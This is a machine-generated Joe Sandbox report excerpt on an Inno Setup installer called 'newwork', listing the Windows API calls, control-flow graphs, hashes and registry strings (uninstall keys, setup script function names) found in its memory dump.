                                                                                        • Opcode Fuzzy Hash: 490a2bf6f62b777b12f8bb075fd261ec892e44da2a65e6c72c5e66397d3a6b60
                                                                                        • Instruction Fuzzy Hash: 95315074A00548ABCB10EB65CD81BDEB7A9DF45304F50C0B6E40CAB3A2DB789F418B59
                                                                                        APIs
                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,00452AC3,?,?,-00000001,00000000), ref: 00452A9D
                                                                                        • GetLastError.KERNEL32(00000000,?,00000000,00452AC3,?,?,-00000001,00000000), ref: 00452AA5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFileFindFirstLast
                                                                                        • String ID:
                                                                                        • API String ID: 873889042-0
                                                                                        • Opcode ID: 9c675a8f1f28b386d0fa8c71b8ecb41695e84785a8bb79b0d9bc0322d07a8b6a
                                                                                        • Instruction ID: 3e58272229af866f17ac5928e9872a720c3be2d4903e778e839a846eb7d55d53
                                                                                        • Opcode Fuzzy Hash: 9c675a8f1f28b386d0fa8c71b8ecb41695e84785a8bb79b0d9bc0322d07a8b6a
                                                                                        • Instruction Fuzzy Hash: 94F0F971A04604AB8B10EF669D4149EF7ACEB8672571046BBFC14E3282DAB84E0485A8
                                                                                        APIs
                                                                                        • GetVersion.KERNEL32(?,0046E17A), ref: 0046E0EE
                                                                                        • CoCreateInstance.OLE32(00499B98,00000000,00000001,00499BA8,?,?,0046E17A), ref: 0046E10A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateInstanceVersion
                                                                                        • String ID:
                                                                                        • API String ID: 1462612201-0
                                                                                        • Opcode ID: 323ef6e325584454da74969db5385277b15969f7569c16a340aaa36caeb4eadb
                                                                                        • Instruction ID: e32462cabb755f907f5de1887460af807d545ab7c9798ff14e002636b2035e3f
                                                                                        • Opcode Fuzzy Hash: 323ef6e325584454da74969db5385277b15969f7569c16a340aaa36caeb4eadb
                                                                                        • Instruction Fuzzy Hash: 90F0A7352812009FEB10975ADC86B8937C47B22315F50007BE04497292D2BD94C0471F
                                                                                        APIs
                                                                                        • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoLocale
                                                                                        • String ID:
                                                                                        • API String ID: 2299586839-0
                                                                                        • Opcode ID: 64da881718ef9bfb5c3691e8182369eeaf442f2681d4624e7b5adc518b999176
                                                                                        • Instruction ID: 8daab3ef8e56b0da8b8c23f45c5b5388ad46b50bd825570c2d348c61856efc62
                                                                                        • Opcode Fuzzy Hash: 64da881718ef9bfb5c3691e8182369eeaf442f2681d4624e7b5adc518b999176
                                                                                        • Instruction Fuzzy Hash: BFE0223170021466C311AA2A9C86AEAB34C9758310F00427FB904E73C2EDB89E4042A8
                                                                                        APIs
                                                                                        • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424151,?,00000000,0042415C), ref: 00423BAE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: NtdllProc_Window
                                                                                        • String ID:
                                                                                        • API String ID: 4255912815-0
                                                                                        • Opcode ID: 03c86555d74cd6010afd77b9e61a524e96c156e733cd5bd8e2feacc4387cef90
                                                                                        • Instruction ID: a748582893d7571d6ac8bdbe819d0a8fbf5f36db2d3505b6f19a51c7a0bbae16
                                                                                        • Opcode Fuzzy Hash: 03c86555d74cd6010afd77b9e61a524e96c156e733cd5bd8e2feacc4387cef90
                                                                                        • Instruction Fuzzy Hash: 47F0B979205608AF8B40DF99C588D4ABBE8AB4C260B058195B988CB321C234ED808F90
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: NameUser
                                                                                        • String ID:
                                                                                        • API String ID: 2645101109-0
                                                                                        • Opcode ID: 969018677e36c7ee3cac7a31a88a81c68082f6a067fe28717e4d5eb0c099a74a
                                                                                        • Instruction ID: 9f318ec9847dd9a6abcb639c8bc611599857aea0b867fcad4bfaeec6bdb042bf
                                                                                        • Opcode Fuzzy Hash: 969018677e36c7ee3cac7a31a88a81c68082f6a067fe28717e4d5eb0c099a74a
                                                                                        • Instruction Fuzzy Hash: 8FD0C27230470473CB00AA689C825AA35CD8B84305F00483E3CC5DA2C3FABDDA485756
                                                                                        APIs
                                                                                        • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F53C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: NtdllProc_Window
                                                                                        • String ID:
                                                                                        • API String ID: 4255912815-0
                                                                                        • Opcode ID: 9e43cbcd657a147b44e82c26281af1c584f356d37a2e763e4ec43db1fd6d4cd6
                                                                                        • Instruction ID: 7ca9c19e24a5def9c493c34941f9da96f9ca037215ec7a65a90973bf7a04e639
                                                                                        • Opcode Fuzzy Hash: 9e43cbcd657a147b44e82c26281af1c584f356d37a2e763e4ec43db1fd6d4cd6
                                                                                        • Instruction Fuzzy Hash: FCD09E7120011D7B9B00DE99E840D6B33AD9B88710B909925F945D7642D634ED9197A5

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 844 46f058-46f08a 845 46f0a7 844->845 846 46f08c-46f093 844->846 847 46f0ae-46f0e6 call 403634 call 403738 call 42dec0 845->847 848 46f095-46f09c 846->848 849 46f09e-46f0a5 846->849 856 46f101-46f12a call 403738 call 42dde4 847->856 857 46f0e8-46f0fc call 403738 call 42dec0 847->857 848->845 848->849 849->847 865 46f12c-46f135 call 46ed28 856->865 866 46f13a-46f163 call 46ee44 856->866 857->856 865->866 870 46f175-46f178 call 403400 866->870 871 46f165-46f173 call 403494 866->871 875 46f17d-46f1c8 call 46ee44 call 42c3fc call 46ee8c call 46ee44 870->875 871->875 884 46f1de-46f1ff call 45559c call 46ee44 875->884 885 46f1ca-46f1dd call 46eeb4 875->885 892 46f255-46f25c 884->892 893 46f201-46f254 call 46ee44 call 431404 call 46ee44 call 431404 call 46ee44 884->893 885->884 894 46f25e-46f29b call 431404 call 46ee44 call 431404 call 46ee44 892->894 895 46f29c-46f2a3 892->895 893->892 894->895 897 46f2e4-46f309 call 40b24c call 46ee44 895->897 898 46f2a5-46f2e3 call 46ee44 * 3 895->898 919 46f30b-46f316 call 47c26c 897->919 920 46f318-46f321 call 403494 897->920 898->897 929 46f326-46f331 call 478e04 919->929 920->929 934 46f333-46f338 929->934 935 46f33a 929->935 936 46f33f-46f509 call 403778 call 46ee44 call 47c26c call 46ee8c call 403494 call 40357c * 2 call 46ee44 call 403494 call 40357c * 2 call 46ee44 call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c call 46ee8c call 47c26c 934->936 935->936 999 46f51f-46f52d call 46eeb4 936->999 1000 46f50b-46f51d call 46ee44 936->1000 1004 46f532 999->1004 1005 46f533-46f57c call 46eeb4 call 46eee8 call 46ee44 call 47c26c call 46ef4c 1000->1005 1004->1005 1016 46f5a2-46f5af 1005->1016 1017 46f57e-46f5a1 call 46eeb4 * 2 1005->1017 1019 46f5b5-46f5bc 1016->1019 1020 46f67e-46f685 1016->1020 1017->1016 1021 46f5be-46f5c5 1019->1021 1022 46f629-46f638 1019->1022 1023 46f687-46f6bd call 494cec 1020->1023 1024 46f6df-46f6f5 RegCloseKey 1020->1024 1021->1022 1026 46f5c7-46f5eb call 430bcc 1021->1026 1029 46f63b-46f648 1022->1029 1023->1024 1026->1029 1039 46f5ed-46f5ee 1026->1039 1030 46f65f-46f678 call 430c08 call 46eeb4 1029->1030 1031 46f64a-46f657 1029->1031 1042 46f67d 1030->1042 1031->1030 1035 46f659-46f65d 1031->1035 1035->1020 1035->1030 1041 46f5f0-46f616 call 40b24c call 479630 1039->1041 1047 46f623-46f625 1041->1047 1048 46f618-46f61e call 430bcc 1041->1048 1042->1020 1047->1041 1050 46f627 1047->1050 1048->1047 1050->1029
                                                                                        APIs
                                                                                          • Part of subcall function 0046EE44: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,0047620E,?,0049C1E0,?,0046F15B,?,00000000,0046F6F6,?,_is1), ref: 0046EE67
                                                                                          • Part of subcall function 0046EEB4: RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F532,?,?,00000000,0046F6F6,?,_is1,?), ref: 0046EEC7
                                                                                        • RegCloseKey.ADVAPI32(?,0046F6FD,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046F748,?,?,0049C1E0,00000000), ref: 0046F6F0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Value$Close
                                                                                        • String ID: " /SILENT$5.5.3 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                                                        • API String ID: 3391052094-3342197833
                                                                                        • Opcode ID: 41e5a022c9dfc144d242315d0234d20c9f1df57cded100a3ade253d049a3cf6c
                                                                                        • Instruction ID: 0d1426ff9ce9a688a4d167ea33859b9e50b28094dc6fe7db73e07d6bdcf854ec
                                                                                        • Opcode Fuzzy Hash: 41e5a022c9dfc144d242315d0234d20c9f1df57cded100a3ade253d049a3cf6c
                                                                                        • Instruction Fuzzy Hash: D1125935A001089BDB04EF95E881ADE73F5EB48304F24817BE8506B366EB79AD45CF5E

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1051 492848-49287c call 403684 1054 49287e-49288d call 446f9c Sleep 1051->1054 1055 492892-49289f call 403684 1051->1055 1060 492d22-492d3c call 403420 1054->1060 1061 4928ce-4928db call 403684 1055->1061 1062 4928a1-4928c4 call 446ff8 call 403738 FindWindowA call 447278 1055->1062 1070 49290a-492917 call 403684 1061->1070 1071 4928dd-492905 call 446ff8 call 403738 FindWindowA call 447278 1061->1071 1081 4928c9 1062->1081 1079 492919-49295b call 446f9c * 4 SendMessageA call 447278 1070->1079 1080 492960-49296d call 403684 1070->1080 1071->1060 1079->1060 1089 4929bc-4929c9 call 403684 1080->1089 1090 49296f-4929b7 call 446f9c * 4 PostMessageA call 4470d0 1080->1090 1081->1060 1098 492a18-492a25 call 403684 1089->1098 1099 4929cb-492a13 call 446f9c * 4 SendNotifyMessageA call 4470d0 1089->1099 1090->1060 1111 492a52-492a5f call 403684 1098->1111 1112 492a27-492a4d call 446ff8 call 403738 RegisterClipboardFormatA call 447278 1098->1112 1099->1060 1127 492a61-492a9b call 446f9c * 3 SendMessageA call 447278 1111->1127 1128 492aa0-492aad call 403684 1111->1128 1112->1060 1127->1060 1140 492aaf-492aef call 446f9c * 3 PostMessageA call 4470d0 1128->1140 1141 492af4-492b01 call 403684 1128->1141 1140->1060 1151 492b48-492b55 call 403684 1141->1151 1152 492b03-492b43 call 446f9c * 3 SendNotifyMessageA call 4470d0 1141->1152 1162 492baa-492bb7 call 403684 1151->1162 1163 492b57-492b75 call 446ff8 call 42e394 1151->1163 1152->1060 1174 492bb9-492be5 call 446ff8 call 403738 call 446f9c GetProcAddress 1162->1174 1175 492c31-492c3e call 403684 1162->1175 1183 492b87-492b95 GetLastError call 447278 1163->1183 1184 492b77-492b85 call 447278 1163->1184 1208 492c21-492c2c call 4470d0 1174->1208 1209 492be7-492c1c call 446f9c * 2 call 447278 call 4470d0 1174->1209 1189 492c40-492c61 call 446f9c FreeLibrary call 4470d0 1175->1189 1190 492c66-492c73 call 403684 1175->1190 1195 492b9a-492ba5 call 447278 1183->1195 1184->1195 1189->1060 1201 492c98-492ca5 call 403684 1190->1201 1202 492c75-492c93 call 446ff8 call 403738 CreateMutexA 1190->1202 1195->1060 1217 492cdb-492ce8 call 403684 1201->1217 1218 492ca7-492cd9 call 48ccc8 call 403574 call 403738 OemToCharBuffA call 48cce0 1201->1218 1202->1060 1208->1060 1209->1060 1227 492cea-492d1c call 48ccc8 call 403574 call 403738 CharToOemBuffA call 48cce0 1217->1227 1228 492d1e 1217->1228 1218->1060 1227->1060 1228->1060
                                                                                        APIs
                                                                                        • Sleep.KERNEL32(00000000,00000000,00492D3D,?,?,?,?,00000000,00000000,00000000), ref: 00492888
                                                                                        • FindWindowA.USER32(00000000,00000000), ref: 004928B9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: FindSleepWindow
                                                                                        • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                                                        • API String ID: 3078808852-3310373309
                                                                                        • Opcode ID: 543bbb3fa16e1ad260fa6bca8d7f7bf65573201bf2c1e3a3e9abb38e798cd817
                                                                                        • Instruction ID: 092cd3663c6e49ee7eb77a287a3c2ed341282e51176ce6ebc4a466309821376d
                                                                                        • Opcode Fuzzy Hash: 543bbb3fa16e1ad260fa6bca8d7f7bf65573201bf2c1e3a3e9abb38e798cd817
                                                                                        • Instruction Fuzzy Hash: D9C182A0B042003BDB14BF3E9D4551F59A99F95708B119A3FB446EB78BCE7CEC0A4359

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1621 483a7c-483aa1 GetModuleHandleA GetProcAddress 1622 483b08-483b0d GetSystemInfo 1621->1622 1623 483aa3-483ab9 GetNativeSystemInfo GetProcAddress 1621->1623 1624 483b12-483b1b 1622->1624 1623->1624 1625 483abb-483ac6 GetCurrentProcess 1623->1625 1626 483b2b-483b32 1624->1626 1627 483b1d-483b21 1624->1627 1625->1624 1634 483ac8-483acc 1625->1634 1630 483b4d-483b52 1626->1630 1628 483b23-483b27 1627->1628 1629 483b34-483b3b 1627->1629 1632 483b29-483b46 1628->1632 1633 483b3d-483b44 1628->1633 1629->1630 1632->1630 1633->1630 1634->1624 1636 483ace-483ad5 call 45271c 1634->1636 1636->1624 1639 483ad7-483ae4 GetProcAddress 1636->1639 1639->1624 1640 483ae6-483afd GetModuleHandleA GetProcAddress 1639->1640 1640->1624 1641 483aff-483b06 1640->1641 1641->1624
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483A8D
                                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483A9A
                                                                                        • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483AA8
                                                                                        • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483AB0
                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483ABC
                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483ADD
                                                                                        • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483AF0
                                                                                        • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483AF6
                                                                                        • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483B0D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                                                        • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                                                        • API String ID: 2230631259-2623177817
                                                                                        • Opcode ID: 7dca9948a1095c4364ab55fa8ed369d502b26d1142efbcbd424e95be4cda74f5
                                                                                        • Instruction ID: d1db678d6bd555fecb25ccca0b477ef677e73c145b16f55f8d8b06b946339d0c
                                                                                        • Opcode Fuzzy Hash: 7dca9948a1095c4364ab55fa8ed369d502b26d1142efbcbd424e95be4cda74f5
                                                                                        • Instruction Fuzzy Hash: 7F1181C0204741A4DA00BFB94D45B6F65889B11F2AF040C7B6840AA287EABCEF44A76E

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1647 468d88-468dc0 call 47c26c 1650 468dc6-468dd6 call 478e24 1647->1650 1651 468fa2-468fbc call 403420 1647->1651 1656 468ddb-468e20 call 4078f4 call 403738 call 42de1c 1650->1656 1662 468e25-468e27 1656->1662 1663 468e2d-468e42 1662->1663 1664 468f98-468f9c 1662->1664 1665 468e57-468e5e 1663->1665 1666 468e44-468e52 call 42dd4c 1663->1666 1664->1651 1664->1656 1668 468e60-468e82 call 42dd4c call 42dd64 1665->1668 1669 468e8b-468e92 1665->1669 1666->1665 1668->1669 1688 468e84 1668->1688 1671 468e94-468eb9 call 42dd4c * 2 1669->1671 1672 468eeb-468ef2 1669->1672 1691 468ebb-468ec4 call 4314f8 1671->1691 1692 468ec9-468edb call 42dd4c 1671->1692 1674 468ef4-468f06 call 42dd4c 1672->1674 1675 468f38-468f3f 1672->1675 1689 468f16-468f28 call 42dd4c 1674->1689 1690 468f08-468f11 call 4314f8 1674->1690 1677 468f41-468f75 call 42dd4c * 3 1675->1677 1678 468f7a-468f90 RegCloseKey 1675->1678 1677->1678 1688->1669 1689->1675 1700 468f2a-468f33 call 4314f8 1689->1700 1690->1689 1691->1692 1692->1672 1704 468edd-468ee6 call 4314f8 1692->1704 1700->1675 1704->1672
                                                                                        APIs
                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                        • RegCloseKey.ADVAPI32(?,00468FA2,?,?,00000001,00000000,00000000,00468FBD,?,00000000,00000000,?), ref: 00468F8B
                                                                                        Strings
                                                                                        • Inno Setup: User Info: Organization, xrefs: 00468F5A
                                                                                        • Inno Setup: Deselected Tasks, xrefs: 00468F19
                                                                                        • Inno Setup: User Info: Name, xrefs: 00468F47
                                                                                        • %s\%s_is1, xrefs: 00468E05
                                                                                        • Inno Setup: App Path, xrefs: 00468E4A
                                                                                        • Inno Setup: No Icons, xrefs: 00468E73
                                                                                        • Inno Setup: Selected Components, xrefs: 00468EAA
                                                                                        • Inno Setup: Selected Tasks, xrefs: 00468EF7
                                                                                        • Inno Setup: Deselected Components, xrefs: 00468ECC
                                                                                        • Inno Setup: User Info: Serial, xrefs: 00468F6D
                                                                                        • Inno Setup: Icon Group, xrefs: 00468E66
                                                                                        • Inno Setup: Setup Type, xrefs: 00468E9A
                                                                                        • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468DE7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpen
                                                                                        • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                        • API String ID: 47109696-1093091907
                                                                                        • Opcode ID: b9928a5b5c0cf6c1dc91f6627cbb06318d05b30c5d76f15ccadbaf9fdfcb7506
                                                                                        • Instruction ID: 069c4cdb4b1287edb5c1b702bebeb6c44c7684ad2aa17a57d1fdfe9a2539746b
                                                                                        • Opcode Fuzzy Hash: b9928a5b5c0cf6c1dc91f6627cbb06318d05b30c5d76f15ccadbaf9fdfcb7506
                                                                                        • Instruction Fuzzy Hash: 6B51A330A006449BCB15DB65D881BDEB7F5EB48304F50857EE840AB391EB79AF01CB59

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 0042D898: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00453DB4,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5), ref: 0042D8AB
                                                                                          • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                          • Part of subcall function 0042D8F0: GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FED,00000000), ref: 0042D90A
                                                                                          • Part of subcall function 0042D8F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
                                                                                        • SHGetKnownFolderPath.SHELL32(00499D30,00008000,00000000,?,00000000,0047C942), ref: 0047C846
                                                                                        • CoTaskMemFree.OLE32(?,0047C88B), ref: 0047C87E
